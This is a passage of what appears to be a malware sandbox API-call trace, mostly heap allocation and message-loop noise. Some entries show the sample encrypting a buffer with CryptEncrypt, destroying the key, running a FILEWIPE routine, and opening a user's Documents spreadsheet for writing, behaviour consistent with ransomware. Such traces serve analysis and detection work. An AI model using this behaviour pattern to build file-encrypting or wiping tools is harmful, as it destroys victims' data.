dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.174] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.175] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.176] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.176] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.176] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.176] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.176] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.177] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1b20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1b30) returned 1 [0180.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.177] CharLowerBuffW (in: lpsz="byte[6961]", cchLength=0xa | out: lpsz="byte[6961]") returned 0xa [0180.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.177] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbea018*, pdwDataLen=0x87e820*=0x1b20, dwBufLen=0x1b30 | out: pbData=0xbea018*, pdwDataLen=0x87e820*=0x1b30) returned 1 [0180.178] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.181] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.182] CryptDestroyKey (hKey=0x90af98) returned 1 [0180.188] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.189] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.189] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0180.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.189] FreeLibrary (hLibModule=0x74f20000) returned 1 [0180.192] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0180.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0x90af58 [0180.194] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.194] CharLowerBuffW (in: lpsz="byte[6944]", cchLength=0xa | out: lpsz="byte[6944]") returned 0xa [0180.194] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0180.194] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0180.194] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0180.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.195] FreeLibrary (hLibModule=0x75c90000) returned 1 [0180.195] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0180.195] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0180.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0180.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0180.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0180.197] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ycwvofdiac7at.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.200] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 